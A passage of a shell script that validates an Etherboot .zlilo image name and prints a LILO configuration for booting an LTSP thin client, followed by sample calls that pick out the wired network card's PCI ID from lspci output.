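    image=$1; disk=${2:-/dev/hda}; mnt=${3:-/mnt/hda1}
    case $image in
        *.zlilo) ;;
        *) echo "expected a .zlilo image, got: $image" >&2; return 1 ;;
    esac
    cat <<EOF
lba32
boot = $disk
map = $mnt/.map
install = $mnt/boot-menu.b
image = $mnt/$image
label=LTSP
EOF
}

# The wireless adapter is also class 0200, so two IDs are listed; pick the wired NIC.
printf '%s\n' "$SAMPLE_LSPCI_N" | ethernet_pci_ids
render_lilo_conf eb-rtl8139.zlilo
```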